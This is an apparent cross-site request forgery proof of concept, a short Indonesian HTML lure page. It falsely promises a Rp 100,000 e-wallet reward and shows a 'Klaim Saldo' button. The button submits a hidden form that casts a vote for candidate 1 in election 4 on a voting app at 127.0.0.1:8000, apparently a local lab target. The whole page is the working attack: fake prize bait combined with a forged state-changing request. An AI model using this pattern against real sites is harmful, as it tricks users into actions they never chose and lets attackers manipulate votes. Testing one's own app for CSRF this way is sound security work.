<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <title>Web Game Gratis</title>
</head>
<body>
    <h2>Selamat! Anda mendapatkan saldo e-wallet Rp 100.000!</h2>
    <p>Klik tombol di bawah ini untuk klaim sekarang juga:</p>

    <form method="POST" action="http://127.0.0.1:8000/voting/election/4/cast/">
        
        <input type="hidden" name="candidate" value="1">
        
        <button type="submit" style="background-color: green; color: white; padding: 10px 20px; font-size: 16px;">Klaim Saldo</button>
    </form>
</body>
</html>